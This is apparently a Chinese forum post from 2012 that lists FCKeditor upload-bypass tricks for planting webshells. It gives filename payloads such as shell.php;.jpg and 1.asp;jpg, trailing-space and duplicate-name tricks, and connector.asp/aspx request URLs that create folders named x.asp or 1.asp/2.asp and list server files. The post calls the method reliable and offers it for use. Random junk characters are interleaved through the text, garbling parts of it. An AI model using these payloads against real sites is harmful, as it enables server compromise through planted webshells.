很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
, v, J# S1 I6 w/ C+ G/ `: `4 O
$ _. ~7 }+ j. ~) D+ _' H+ F4 d提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
" ~$ ^0 M2 ]- @* ?
# I" a; H* X+ z( Y7 c4 R继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
& o. v6 Q2 ^( S5 U
: E6 l4 g9 V* l; i, f2 Y突破建立文件夹:+ ^- r4 T0 v5 C9 \
7 s. a% N4 K: j
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp/ j# ]- K& U8 t( ^: v" o
7 H- G6 |- H; S2 p3 Y
参数:
( x8 B$ l5 g! C m( s) e x% |
当前目录名:CurrentFolder=/qing.asp& a- w9 k: s* u5 [" x. @* c# E
+ @: d/ _# M4 [
新的目录名:NewFolderName=x.asp
3 u1 k6 J) d- R6 m3 @+ K! r. a+ F; a/ q, m; c9 Q9 b9 v2 x
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……% c7 |1 y E6 W4 R& ?
5 R: {( k* D( K# a z那么 x.asp 就已经建立生成了,此方法百试百灵!; P# `, K7 @; `8 i M
9 K, ^6 N! Y4 c3 U$ ?5 L
新建文件夹参数 x.asp,基本都能搞定。
1 c. i4 r- d1 M7 o
! |6 T0 w$ b7 X6 j5 H( i/ E下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
- @8 Z7 g) j m2 @! q6 j: W2 |! d/ Y1 v/ T- U7 ~" H5 i
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
4 k, s& D! Z; v2 O, N; p1 J1 g# k" |0 K9 m) ?+ m7 Z; y( `5 [1 U& D
获取文件列表. H* G* [0 H' q* _
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
5 L; C3 _: c$ H. x2 e& `5 H0 Q& ]7 f$ U/ x8 d2 i2 |
|
发表于 2012-12-31 09:27:09
收藏
支持
反对